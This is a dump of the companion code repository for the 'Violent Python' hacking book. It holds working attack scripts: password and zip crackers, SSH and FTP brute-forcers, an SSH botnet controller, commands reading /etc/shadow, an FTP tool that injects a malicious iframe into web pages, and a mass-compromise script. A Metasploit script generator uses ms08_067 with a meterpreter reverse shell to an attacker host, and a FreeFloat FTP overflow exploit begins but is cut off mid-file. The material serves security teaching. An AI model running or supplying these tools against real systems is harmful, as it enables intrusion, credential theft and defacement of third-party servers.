├── CH1 ├── .DS_Store ├── 1-vulnScanner.py ├── 2-passwdCrack.py ├── 3-zipCrack.py ├── dictionary.txt ├── evil.zip ├── passwords.txt └── vuln-banners.txt ├── CH2 ├── .DS_Store ├── 1-portScan.py ├── 2-nmapScan.py ├── 3-botNet.py ├── 3-bruteKey.py ├── 3-pxsshCommand.py ├── 3-sshBrute.py ├── 3-sshCommand.py ├── 4-anonLogin.py ├── 4-bruteLogin.py ├── 4-defaultPages.py ├── 4-injectPage.py ├── 4-massCompromise.py ├── 5-conficker.py ├── 6-freeFloat.py ├── pass.txt └── userpass.txt ├── CH3 ├── .DS_Store ├── 1-discoverNetworks.py ├── 2-dumpRecycleBin.py ├── 3-pdfRead.py ├── 4-exifFetch.py ├── 5-skypeParse.py ├── 6-firefoxParse.py ├── 7-iphoneMessages.py ├── firefox_profile.zip └── skype_profile.zip ├── CH4 ├── .DS_Store ├── 1-geoIP.py ├── 10-idsFoil.py ├── 2-printDirection.py ├── 3-geoPrint.py ├── 4-googleEarthPcap.py ├── 5-findDDoS.py ├── 6-spoofDetect.py ├── 7-testFastFlux.py ├── 8-testDomainFlux.py ├── 9-mitnickAttack.py ├── attack.pcap ├── domainFlux.pcap ├── download.pcap ├── fastFlux.pcap ├── geotest.kml ├── geotest.pcap └── hivemind.pcap ├── CH5 ├── .DS_Store ├── 1-testSniff.py ├── 10-iphoneFinder.py ├── 11-rfcommScan.py ├── 12-sdpScan.py ├── 13-ninjaPrint.py ├── 14-blueBug.py ├── 2-creditSniff.py ├── 3-hotelSniff.py ├── 4-googleSniff.py ├── 5-ftpSniff.py ├── 6-sniffHidden.py ├── 6-sniffProbe.py ├── 7-dup.py ├── 7-uavSniff.py ├── 8-fireCatcher.py ├── 9-btFind.py ├── 9-btScan.py └── dup.py ├── CH6 ├── .DS_Store ├── .project ├── .pydevproject ├── .svn │ ├── entries │ ├── prop-base │ │ ├── twitter.pyc.svn-base │ │ ├── violent_browser.pyc.svn-base │ │ ├── violent_email.pyc.svn-base │ │ ├── violent_person.pyc.svn-base │ │ └── web_common.pyc.svn-base │ └── text-base │ │ ├── .project.svn-base │ │ ├── .pydevproject.svn-base │ │ ├── anon_scrape.py.svn-base │ │ ├── basic_usage.py.svn-base │ │ ├── create_browser.py.svn-base │ │ ├── facebook.py.svn-base │ │ ├── google.py.svn-base │ │ ├── parse_webpage.py.svn-base │ │ ├── phishing.py.svn-base │ │ ├── quarkbase.py.svn-base │ │ ├── simple_scrape.py.svn-base │ │ ├── temp.html.svn-base │ │ ├── test.py.svn-base │ │ ├── twitter.py.svn-base │ │ ├── twitter.pyc.svn-base │ │ ├── twitter_interests.py.svn-base │ │ ├── twitter_locate.py.svn-base │ │ ├── violent_browser.py.svn-base │ │ ├── violent_browser.pyc.svn-base │ │ ├── violent_email.py.svn-base │ │ ├── violent_email.pyc.svn-base │ │ ├── violent_person.py.svn-base │ │ ├── violent_person.pyc.svn-base │ │ ├── web_common.py.svn-base │ │ └── web_common.pyc.svn-base ├── 1-viewPage.py ├── 10-sendMail.py ├── 10-sendSpam.py ├── 2-proxyTest.py ├── 3-userAgentTest.py ├── 4-printCookies.py ├── 5-kittenTest.py ├── 6-linkParser.py ├── 7-imageMirror.py ├── 8-anonGoogle.py ├── 8-googleJson.py ├── 8-googleJumbled.py ├── 9-twitterClass.py ├── 9-twitterGeo.py ├── 9-twitterInterests.py ├── 9-twitterRecon.py ├── anonBrowser.py ├── anonBrowser.pyc ├── mlb-cities.txt └── twitterClass.py ├── CH7 ├── .DS_Store ├── 1-bindshell.py └── 2-virusCheck.py ├── README.md └── Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf /CH1/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH1/.DS_Store -------------------------------------------------------------------------------- /CH1/1-vulnScanner.py: -------------------------------------------------------------------------------- 1 | 2 | import socket 3 | import os 4 | import sys 5 | 6 | 7 | def retBanner(ip, port): 8 | try: 9 | socket.setdefaulttimeout(2) 10 | s = socket.socket() 11 | s.connect((ip, port)) 12 | banner = s.recv(1024) 13 | return banner 14 | except: 15 | return 16 | 17 | 18 | def checkVulns(banner, filename): 19 | 20 | f = open(filename, 'r') 21 | for line in f.readlines(): 22 | if line.strip('\n') in banner: 23 | print('[+] Server is vulnerable: ' + banner.strip('\n')) 24 | 25 | 26 | 27 | def main(): 28 | 29 | if len(sys.argv) == 2: 30 | filename = sys.argv[1] 31 | if not os.path.isfile(filename): 32 | print('[-] ' + filename +\ 33 | ' does not exist.') 34 | exit(0) 35 | 36 | if not os.access(filename, os.R_OK): 37 | print('[-] ' + filename +\ 38 | ' access denied.') 39 | exit(0) 40 | else: 41 | print('[-] Usage: ' + str(sys.argv[0]) +\ 42 | ' ') 43 | exit(0) 44 | 45 | portList = [21,22,25,80,110,443] 46 | for x in range(147, 150): 47 | ip = '192.168.95.' + str(x) 48 | for port in portList: 49 | banner = retBanner(ip, port) 50 | if banner: 51 | print ('[+] ' + ip + ' : ' + banner) 52 | checkVulns(banner, filename) 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | -------------------------------------------------------------------------------- /CH1/2-passwdCrack.py: -------------------------------------------------------------------------------- 1 | import crypt 2 | 3 | 4 | def testPass(cryptPass): 5 | salt = cryptPass[0:2] 6 | dictFile = open('dictionary.txt', 'r') 7 | for word in dictFile.readlines(): 8 | word = word.strip('\n') 9 | cryptWord = crypt.crypt(word, salt) 10 | if cryptWord == cryptPass: 11 | print('[+] Found Password: '+ word + '\n') 12 | return 13 | print('[-] Password Not Found.\n') 14 | return 15 | 16 | 17 | def main(): 18 | passFile = open('passwords.txt') 19 | for line in passFile.readlines(): 20 | if ':' in line: 21 | user = line.split(':')[0] 22 | cryptPass = line.split(':')[1].strip(' ') 23 | print('[*] Cracking Password For: ' + user) 24 | testPass(cryptPass) 25 | 26 | 27 | if __name__ == '__main__': 28 | main() 29 | -------------------------------------------------------------------------------- /CH1/3-zipCrack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import zipfile 4 | import optparse 5 | from threading import Thread 6 | 7 | 8 | def extractFile(zFile, password): 9 | try: 10 | zFile.extractall(pwd=password) 11 | print('[+] Found password ' + password + '\n') 12 | except: 13 | pass 14 | 15 | 16 | def main(): 17 | parser = optparse.OptionParser("usage %prog "+\ 18 | "-f -d ") 19 | parser.add_option('-f', dest='zname', type='string',\ 20 | help='specify zip file') 21 | parser.add_option('-d', dest='dname', type='string',\ 22 | help='specify dictionary file') 23 | (options, args) = parser.parse_args() 24 | if (options.zname == None) | (options.dname == None): 25 | print(parser.usage) 26 | exit(0) 27 | else: 28 | zname = options.zname 29 | dname = options.dname 30 | 31 | zFile = zipfile.ZipFile(zname) 32 | passFile = open(dname) 33 | 34 | for line in passFile.readlines(): 35 | password = line.strip('\n') 36 | t = Thread(target=extractFile, args=(zFile, password)) 37 | t.start() 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /CH1/dictionary.txt: -------------------------------------------------------------------------------- 1 | apple 2 | orange 3 | egg 4 | lemon 5 | grapes 6 | secret 7 | strawberry 8 | password 9 | -------------------------------------------------------------------------------- /CH1/evil.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH1/evil.zip -------------------------------------------------------------------------------- /CH1/passwords.txt: -------------------------------------------------------------------------------- 1 | victim: HX9LLTdc/jiDE: 503:100:Iama Victim:/home/victim:/bin/sh 2 | root: DFNFxgW7C05fo: 504:100: Markus Hess:/root:/bin/bash 3 | -------------------------------------------------------------------------------- /CH1/vuln-banners.txt: -------------------------------------------------------------------------------- 1 | 3Com 3CDaemon FTP Server Version 2.0 2 | Ability Server 2.34 3 | 4 | CCProxy Telnet Service Ready 5 | 6 | ESMTP TABS Mail Server for Windows NT 7 | 8 | FreeFloat Ftp Server (Version 1.00) 9 | 10 | IMAP4rev1 MDaemon 9.6.4 ready 11 | 12 | MailEnable Service, Version: 0-1.54 13 | 14 | NetDecision-HTTP-Server 1.0 15 | PSO Proxy 0.9 16 | 17 | SAMBAR 18 | 19 | Sami FTP Server 2.0.2 20 | 21 | Spipe 1.0 22 | 23 | TelSrv 1.5 24 | 25 | WDaemon 6.8.5 26 | 27 | WinGate 6.1.1 28 | Xitami 29 | 30 | YahooPOPs! Simple Mail Transfer Service Ready 31 | -------------------------------------------------------------------------------- /CH2/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH2/.DS_Store -------------------------------------------------------------------------------- /CH2/1-portScan.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from socket import * 3 | from threading import * 4 | 5 | screenLock = Semaphore(value=1) 6 | 7 | def connScan(tgtHost, tgtPort): 8 | try: 9 | connSkt = socket(AF_INET, SOCK_STREAM) 10 | connSkt.connect((tgtHost, tgtPort)) 11 | connSkt.send('ViolentPython\r\n') 12 | results = connSkt.recv(100) 13 | screenLock.acquire() 14 | print('[+] %d/tcp open' % tgtPort) 15 | print('[+] ' + str(results)) 16 | except: 17 | screenLock.acquire() 18 | print('[-] %d/tcp closed' % tgtPort) 19 | finally: 20 | screenLock.release() 21 | connSkt.close() 22 | 23 | def portScan(tgtHost, tgtPorts): 24 | try: 25 | tgtIP = gethostbyname(tgtHost) 26 | except: 27 | print("[-] Cannot resolve '%s': Unknown host" %tgtHost) 28 | return 29 | 30 | try: 31 | tgtName = gethostbyaddr(tgtIP) 32 | print('\n[+] Scan Results for: ' + tgtName[0]) 33 | except: 34 | print('\n[+] Scan Results for: ' + tgtIP) 35 | 36 | setdefaulttimeout(1) 37 | for tgtPort in tgtPorts: 38 | t = Thread(target=connScan,args=(tgtHost,int(tgtPort))) 39 | t.start() 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-H -p ') 44 | parser.add_option('-H', dest='tgtHost', type='string',\ 45 | help='specify target host') 46 | parser.add_option('-p', dest='tgtPort', type='string',\ 47 | help='specify target port[s] separated by comma') 48 | 49 | (options, args) = parser.parse_args() 50 | 51 | tgtHost = options.tgtHost 52 | tgtPorts = str(options.tgtPort).split(',') 53 | 54 | if (tgtHost == None) | (tgtPorts[0] == None): 55 | print(parser.usage) 56 | exit(0) 57 | 58 | portScan(tgtHost, tgtPorts) 59 | 60 | 61 | if __name__ == '__main__': 62 | main() 63 | -------------------------------------------------------------------------------- /CH2/2-nmapScan.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import optparse 3 | 4 | def nmapScan(tgtHost,tgtPort): 5 | nmScan = nmap.PortScanner() 6 | nmScan.scan(tgtHost,tgtPort) 7 | state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] 8 | print "[*] " + tgtHost + " tcp/"+tgtPort +" "+state 9 | 10 | def main(): 11 | parser = optparse.OptionParser('usage %prog '+\ 12 | '-H -p ') 13 | parser.add_option('-H', dest='tgtHost', type='string',\ 14 | help='specify target host') 15 | parser.add_option('-p', dest='tgtPort', type='string',\ 16 | help='specify target port[s] separated by comma') 17 | 18 | (options, args) = parser.parse_args() 19 | 20 | tgtHost = options.tgtHost 21 | tgtPorts = str(options.tgtPort).split(',') 22 | 23 | if (tgtHost == None) | (tgtPorts[0] == None): 24 | print parser.usage 25 | exit(0) 26 | for tgtPort in tgtPorts: 27 | nmapScan(tgtHost, tgtPort) 28 | 29 | 30 | if __name__ == '__main__': 31 | main() 32 | 33 | -------------------------------------------------------------------------------- /CH2/3-botNet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import optparse 4 | import pxssh 5 | 6 | 7 | class Client: 8 | 9 | def __init__(self, host, user, password): 10 | self.host = host 11 | self.user = user 12 | self.password = password 13 | self.session = self.connect() 14 | 15 | def connect(self): 16 | try: 17 | s = pxssh.pxssh() 18 | s.login(self.host, self.user, self.password) 19 | return s 20 | except Exception, e: 21 | print e 22 | print '[-] Error Connecting' 23 | 24 | def send_command(self, cmd): 25 | self.session.sendline(cmd) 26 | self.session.prompt() 27 | return self.session.before 28 | 29 | 30 | def botnetCommand(command): 31 | for client in botNet: 32 | output = client.send_command(command) 33 | print '[*] Output from ' + client.host 34 | print '[+] ' + output 35 | 36 | 37 | def addClient(host, user, password): 38 | client = Client(host, user, password) 39 | botNet.append(client) 40 | 41 | 42 | botNet = [] 43 | addClient('127.0.0.1', 'root', 'toor') 44 | addClient('127.0.0.1', 'root', 'toor') 45 | addClient('127.0.0.1', 'root', 'toor') 46 | 47 | botnetCommand('uname -v') 48 | botnetCommand('cat /etc/issue') 49 | -------------------------------------------------------------------------------- /CH2/3-bruteKey.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pexpect 4 | import optparse 5 | import os 6 | from threading import * 7 | 8 | maxConnections = 5 9 | connection_lock = BoundedSemaphore(value=maxConnections) 10 | Stop = False 11 | Fails = 0 12 | 13 | 14 | def connect(user,host,keyfile,release): 15 | global Stop 16 | global Fails 17 | try: 18 | perm_denied = 'Permission denied' 19 | ssh_newkey = 'Are you sure you want to continue' 20 | conn_closed = 'Connection closed by remote host' 21 | opt = ' -o PasswordAuthentication=no' 22 | connStr = 'ssh ' + user +\ 23 | '@' + host + ' -i ' + keyfile + opt 24 | child = pexpect.spawn(connStr) 25 | ret = child.expect([pexpect.TIMEOUT,perm_denied,\ 26 | ssh_newkey,conn_closed,'$','#',]) 27 | if ret == 2: 28 | print '[-] Adding Host to ~/.ssh/known_hosts' 29 | child.sendline('yes') 30 | connect(user, host, keyfile, False) 31 | elif ret == 3: 32 | print '[-] Connection Closed By Remote Host' 33 | Fails += 1 34 | elif ret > 3: 35 | print '[+] Success. ' + str(keyfile) 36 | Stop = True 37 | finally: 38 | if release: 39 | connection_lock.release() 40 | 41 | 42 | def main(): 43 | parser = optparse.OptionParser('usage %prog -H '+\ 44 | ' -u -d ') 45 | parser.add_option('-H', dest='tgtHost', type='string',\ 46 | help='specify target host') 47 | parser.add_option('-d', dest='passDir', type='string',\ 48 | help='specify directory with keys') 49 | parser.add_option('-u', dest='user', type='string',\ 50 | help='specify the user') 51 | 52 | (options, args) = parser.parse_args() 53 | host = options.tgtHost 54 | passDir = options.passDir 55 | user = options.user 56 | 57 | if host == None or passDir == None or user == None: 58 | print parser.usage 59 | exit(0) 60 | 61 | for filename in os.listdir(passDir): 62 | if Stop: 63 | print '[*] Exiting: Key Found.' 64 | exit(0) 65 | if Fails > 5: 66 | print '[!] Exiting: '+\ 67 | 'Too Many Connections Closed By Remote Host.' 68 | print '[!] Adjust number of simultaneous threads.' 69 | exit(0) 70 | connection_lock.acquire() 71 | fullpath = os.path.join(passDir, filename) 72 | print '[-] Testing keyfile ' + str(fullpath) 73 | t = Thread(target=connect,\ 74 | args=(user, host, fullpath, True)) 75 | child = t.start() 76 | 77 | 78 | if __name__ == '__main__': 79 | main() 80 | -------------------------------------------------------------------------------- /CH2/3-pxsshCommand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pxssh 4 | 5 | 6 | def send_command(s, cmd): 7 | s.sendline(cmd) 8 | s.prompt() 9 | print s.before 10 | 11 | 12 | def connect(host, user, password): 13 | try: 14 | s = pxssh.pxssh() 15 | s.login(host, user, password) 16 | return s 17 | except: 18 | print '[-] Error Connecting' 19 | exit(0) 20 | 21 | s = connect('127.0.0.1', 'root', 'toor') 22 | send_command(s, 'cat /etc/shadow | grep root') 23 | 24 | -------------------------------------------------------------------------------- /CH2/3-sshBrute.py: -------------------------------------------------------------------------------- 1 | import pxssh 2 | import optparse 3 | import time 4 | from threading import * 5 | 6 | maxConnections = 5 7 | connection_lock = BoundedSemaphore(value=maxConnections) 8 | 9 | Found = False 10 | Fails = 0 11 | 12 | def connect(host, user, password, release): 13 | global Found 14 | global Fails 15 | 16 | try: 17 | s = pxssh.pxssh() 18 | s.login(host, user, password) 19 | print '[+] Password Found: ' + password 20 | Found = True 21 | except Exception, e: 22 | if 'read_nonblocking' in str(e): 23 | Fails += 1 24 | time.sleep(5) 25 | connect(host, user, password, False) 26 | elif 'synchronize with original prompt' in str(e): 27 | time.sleep(1) 28 | connect(host, user, password, False) 29 | 30 | finally: 31 | if release: connection_lock.release() 32 | 33 | def main(): 34 | parser = optparse.OptionParser('usage %prog '+\ 35 | '-H -u -F ' 36 | ) 37 | parser.add_option('-H', dest='tgtHost', type='string',\ 38 | help='specify target host') 39 | parser.add_option('-F', dest='passwdFile', type='string',\ 40 | help='specify password file') 41 | parser.add_option('-u', dest='user', type='string',\ 42 | help='specify the user') 43 | 44 | (options, args) = parser.parse_args() 45 | host = options.tgtHost 46 | passwdFile = options.passwdFile 47 | user = options.user 48 | 49 | if host == None or passwdFile == None or user == None: 50 | print parser.usage 51 | exit(0) 52 | 53 | fn = open(passwdFile, 'r') 54 | for line in fn.readlines(): 55 | 56 | if Found: 57 | print "[*] Exiting: Password Found" 58 | exit(0) 59 | if Fails > 5: 60 | print "[!] Exiting: Too Many Socket Timeouts" 61 | exit(0) 62 | 63 | connection_lock.acquire() 64 | password = line.strip('\r').strip('\n') 65 | print "[-] Testing: "+str(password) 66 | t = Thread(target=connect, args=(host, user,\ 67 | password, True)) 68 | child = t.start() 69 | 70 | if __name__ == '__main__': 71 | main() 72 | 73 | -------------------------------------------------------------------------------- /CH2/3-sshCommand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pexpect 4 | 5 | PROMPT = ['# ', '>>> ', '> ','\$ '] 6 | 7 | def send_command(child, cmd): 8 | child.sendline(cmd) 9 | child.expect(PROMPT) 10 | print child.before 11 | 12 | def connect(user, host, password): 13 | ssh_newkey = 'Are you sure you want to continue connecting' 14 | connStr = 'ssh ' + user + '@' + host 15 | child = pexpect.spawn(connStr) 16 | ret = child.expect([pexpect.TIMEOUT, ssh_newkey,\ 17 | '[P|p]assword:']) 18 | 19 | if ret == 0: 20 | print '[-] Error Connecting' 21 | return 22 | 23 | if ret == 1: 24 | child.sendline('yes') 25 | ret = child.expect([pexpect.TIMEOUT, \ 26 | '[P|p]assword:']) 27 | if ret == 0: 28 | print '[-] Error Connecting' 29 | return 30 | 31 | child.sendline(password) 32 | child.expect(PROMPT) 33 | return child 34 | 35 | 36 | def main(): 37 | host = 'localhost' 38 | user = 'root' 39 | password = 'toor' 40 | 41 | child = connect(user, host, password) 42 | send_command(child, 'cat /etc/shadow | grep root') 43 | 44 | if __name__ == '__main__': 45 | main() 46 | 47 | -------------------------------------------------------------------------------- /CH2/4-anonLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import ftplib 5 | 6 | def anonLogin(hostname): 7 | try: 8 | ftp = ftplib.FTP(hostname) 9 | ftp.login('anonymous', 'me@your.com') 10 | print '\n[*] ' + str(hostname) +\ 11 | ' FTP Anonymous Logon Succeeded.' 12 | ftp.quit() 13 | return True 14 | except Exception, e: 15 | print '\n[-] ' + str(hostname) +\ 16 | ' FTP Anonymous Logon Failed.' 17 | return False 18 | 19 | 20 | host = '192.168.95.179' 21 | anonLogin(host) 22 | -------------------------------------------------------------------------------- /CH2/4-bruteLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import ftplib, time 5 | 6 | def bruteLogin(hostname, passwdFile): 7 | pF = open(passwdFile, 'r') 8 | for line in pF.readlines(): 9 | time.sleep(1) 10 | userName = line.split(':')[0] 11 | passWord = line.split(':')[1].strip('\r').strip('\n') 12 | print "[+] Trying: "+userName+"/"+passWord 13 | try: 14 | ftp = ftplib.FTP(hostname) 15 | ftp.login(userName, passWord) 16 | print '\n[*] ' + str(hostname) +\ 17 | ' FTP Logon Succeeded: '+userName+"/"+passWord 18 | ftp.quit() 19 | return (userName, passWord) 20 | except Exception, e: 21 | pass 22 | print '\n[-] Could not brute force FTP credentials.' 23 | return (None, None) 24 | 25 | 26 | host = '192.168.95.179' 27 | passwdFile = 'userpass.txt' 28 | bruteLogin(host, passwdFile) 29 | -------------------------------------------------------------------------------- /CH2/4-defaultPages.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import ftplib 4 | 5 | 6 | def returnDefault(ftp): 7 | try: 8 | dirList = ftp.nlst() 9 | except: 10 | dirList = [] 11 | print '[-] Could not list directory contents.' 12 | print '[-] Skipping To Next Target.' 13 | return 14 | 15 | retList = [] 16 | for fileName in dirList: 17 | fn = fileName.lower() 18 | if '.php' in fn or '.htm' in fn or '.asp' in fn: 19 | print '[+] Found default page: ' + fileName 20 | retList.append(fileName) 21 | return retList 22 | 23 | 24 | host = '192.168.95.179' 25 | userName = 'guest' 26 | passWord = 'guest' 27 | ftp = ftplib.FTP(host) 28 | ftp.login(userName, passWord) 29 | returnDefault(ftp) 30 | -------------------------------------------------------------------------------- /CH2/4-injectPage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import ftplib 5 | 6 | 7 | def injectPage(ftp, page, redirect): 8 | f = open(page + '.tmp', 'w') 9 | ftp.retrlines('RETR ' + page, f.write) 10 | print '[+] Downloaded Page: ' + page 11 | 12 | f.write(redirect) 13 | f.close() 14 | print '[+] Injected Malicious IFrame on: ' + page 15 | 16 | ftp.storlines('STOR ' + page, open(page + '.tmp')) 17 | print '[+] Uploaded Injected Page: ' + page 18 | 19 | 20 | host = '192.168.95.179' 21 | userName = 'guest' 22 | passWord = 'guest' 23 | ftp = ftplib.FTP(host) 24 | ftp.login(userName, passWord) 25 | redirect = '' 27 | injectPage(ftp, 'index.html', redirect) 28 | -------------------------------------------------------------------------------- /CH2/4-massCompromise.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import ftplib 4 | import optparse 5 | import time 6 | 7 | 8 | def anonLogin(hostname): 9 | try: 10 | ftp = ftplib.FTP(hostname) 11 | ftp.login('anonymous', 'me@your.com') 12 | print '\n[*] ' + str(hostname) \ 13 | + ' FTP Anonymous Logon Succeeded.' 14 | ftp.quit() 15 | return True 16 | except Exception, e: 17 | print '\n[-] ' + str(hostname) +\ 18 | ' FTP Anonymous Logon Failed.' 19 | return False 20 | 21 | 22 | def bruteLogin(hostname, passwdFile): 23 | pF = open(passwdFile, 'r') 24 | for line in pF.readlines(): 25 | time.sleep(1) 26 | userName = line.split(':')[0] 27 | passWord = line.split(':')[1].strip('\r').strip('\n') 28 | print '[+] Trying: ' + userName + '/' + passWord 29 | try: 30 | ftp = ftplib.FTP(hostname) 31 | ftp.login(userName, passWord) 32 | print '\n[*] ' + str(hostname) +\ 33 | ' FTP Logon Succeeded: '+userName+'/'+passWord 34 | ftp.quit() 35 | return (userName, passWord) 36 | except Exception, e: 37 | pass 38 | print '\n[-] Could not brute force FTP credentials.' 39 | return (None, None) 40 | 41 | 42 | def returnDefault(ftp): 43 | try: 44 | dirList = ftp.nlst() 45 | except: 46 | dirList = [] 47 | print '[-] Could not list directory contents.' 48 | print '[-] Skipping To Next Target.' 49 | return 50 | 51 | retList = [] 52 | for fileName in dirList: 53 | fn = fileName.lower() 54 | if '.php' in fn or '.htm' in fn or '.asp' in fn: 55 | print '[+] Found default page: ' + fileName 56 | retList.append(fileName) 57 | return retList 58 | 59 | 60 | def injectPage(ftp, page, redirect): 61 | f = open(page + '.tmp', 'w') 62 | ftp.retrlines('RETR ' + page, f.write) 63 | print '[+] Downloaded Page: ' + page 64 | 65 | f.write(redirect) 66 | f.close() 67 | print '[+] Injected Malicious IFrame on: ' + page 68 | 69 | ftp.storlines('STOR ' + page, open(page + '.tmp')) 70 | print '[+] Uploaded Injected Page: ' + page 71 | 72 | 73 | def attack(username,password,tgtHost,redirect): 74 | ftp = ftplib.FTP(tgtHost) 75 | ftp.login(username, password) 76 | defPages = returnDefault(ftp) 77 | for defPage in defPages: 78 | injectPage(ftp, defPage, redirect) 79 | 80 | 81 | def main(): 82 | parser = optparse.OptionParser('usage %prog '+\ 83 | '-H -r '+\ 84 | '[-f ]') 85 | 86 | parser.add_option('-H', dest='tgtHosts',\ 87 | type='string', help='specify target host') 88 | parser.add_option('-f', dest='passwdFile',\ 89 | type='string', help='specify user/password file') 90 | parser.add_option('-r', dest='redirect',\ 91 | type='string',help='specify a redirection page') 92 | 93 | (options, args) = parser.parse_args() 94 | tgtHosts = str(options.tgtHosts).split(',') 95 | passwdFile = options.passwdFile 96 | redirect = options.redirect 97 | 98 | if tgtHosts == None or redirect == None: 99 | print parser.usage 100 | exit(0) 101 | 102 | for tgtHost in tgtHosts: 103 | username = None 104 | password = None 105 | 106 | if anonLogin(tgtHost) == True: 107 | username = 'anonymous' 108 | password = 'me@your.com' 109 | print '[+] Using Anonymous Creds to attack' 110 | attack(username, password, tgtHost, redirect) 111 | 112 | elif passwdFile != None: 113 | (username, password) =\ 114 | bruteLogin(tgtHost, passwdFile) 115 | if password != None: 116 | '[+] Using Creds: ' +\ 117 | username + '/' + password + ' to attack' 118 | attack(username, password, tgtHost, redirect) 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /CH2/5-conficker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import optparse 5 | import sys 6 | import nmap 7 | 8 | 9 | def findTgts(subNet): 10 | nmScan = nmap.PortScanner() 11 | nmScan.scan(subNet, '445') 12 | tgtHosts = [] 13 | for host in nmScan.all_hosts(): 14 | if nmScan[host].has_tcp(445): 15 | state = nmScan[host]['tcp'][445]['state'] 16 | if state == 'open': 17 | print '[+] Found Target Host: ' + host 18 | tgtHosts.append(host) 19 | return tgtHosts 20 | 21 | 22 | def setupHandler(configFile, lhost, lport): 23 | configFile.write('use exploit/multi/handler\n') 24 | configFile.write('set payload '+\ 25 | 'windows/meterpreter/reverse_tcp\n') 26 | configFile.write('set LPORT ' + str(lport) + '\n') 27 | configFile.write('set LHOST ' + lhost + '\n') 28 | configFile.write('exploit -j -z\n') 29 | configFile.write('setg DisablePayloadHandler 1\n') 30 | 31 | 32 | def confickerExploit(configFile,tgtHost,lhost,lport): 33 | configFile.write('use exploit/windows/smb/ms08_067_netapi\n') 34 | configFile.write('set RHOST ' + str(tgtHost) + '\n') 35 | configFile.write('set payload '+\ 36 | 'windows/meterpreter/reverse_tcp\n') 37 | configFile.write('set LPORT ' + str(lport) + '\n') 38 | configFile.write('set LHOST ' + lhost + '\n') 39 | configFile.write('exploit -j -z\n') 40 | 41 | 42 | def smbBrute(configFile,tgtHost,passwdFile,lhost,lport): 43 | username = 'Administrator' 44 | pF = open(passwdFile, 'r') 45 | for password in pF.readlines(): 46 | password = password.strip('\n').strip('\r') 47 | configFile.write('use exploit/windows/smb/psexec\n') 48 | configFile.write('set SMBUser ' + str(username) + '\n') 49 | configFile.write('set SMBPass ' + str(password) + '\n') 50 | configFile.write('set RHOST ' + str(tgtHost) + '\n') 51 | configFile.write('set payload '+\ 52 | 'windows/meterpreter/reverse_tcp\n') 53 | configFile.write('set LPORT ' + str(lport) + '\n') 54 | configFile.write('set LHOST ' + lhost + '\n') 55 | configFile.write('exploit -j -z\n') 56 | 57 | 58 | def main(): 59 | configFile = open('meta.rc', 'w') 60 | 61 | parser = optparse.OptionParser('[-] Usage %prog '+\ 62 | '-H -l [-p -F ]') 63 | parser.add_option('-H', dest='tgtHost', type='string',\ 64 | help='specify the target address[es]') 65 | parser.add_option('-p', dest='lport', type='string',\ 66 | help='specify the listen port') 67 | parser.add_option('-l', dest='lhost', type='string',\ 68 | help='specify the listen address') 69 | parser.add_option('-F', dest='passwdFile', type='string',\ 70 | help='password file for SMB brute force attempt') 71 | 72 | (options, args) = parser.parse_args() 73 | 74 | if (options.tgtHost == None) | (options.lhost == None): 75 | print parser.usage 76 | exit(0) 77 | 78 | lhost = options.lhost 79 | lport = options.lport 80 | if lport == None: 81 | lport = '1337' 82 | passwdFile = options.passwdFile 83 | tgtHosts = findTgts(options.tgtHost) 84 | 85 | setupHandler(configFile, lhost, lport) 86 | 87 | for tgtHost in tgtHosts: 88 | confickerExploit(configFile, tgtHost, lhost, lport) 89 | if passwdFile != None: 90 | smbBrute(configFile,tgtHost,passwdFile,lhost,lport) 91 | 92 | configFile.close() 93 | os.system('msfconsole -r meta.rc') 94 | 95 | 96 | if __name__ == '__main__': 97 | main() 98 | -------------------------------------------------------------------------------- /CH2/6-freeFloat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/Python 2 | #Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows 3 | #Author: Craig Freyman (@cd1zz) 4 | #Date: July 19, 2011 5 | #Tested on Windows XP SP3 English 6 | #Part of FreeFloat pwn week 7 | #Vendor Notified: 7-18-2011 (no response) 8 | #Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php 9 | 10 | import socket,sys,time,struct 11 | 12 | if len(sys.argv) < 2: 13 | print "[-]Usage: %s " % sys.argv[0] + "\r" 14 | print "[-]For example [filename.py 192.168.1.10 PWND] would do the trick." 15 | print "[-]Other options: AUTH, APPE, ALLO, ACCT" 16 | sys.exit(0) 17 | 18 | target = sys.argv[1] 19 | command = sys.argv[2] 20 | 21 | if 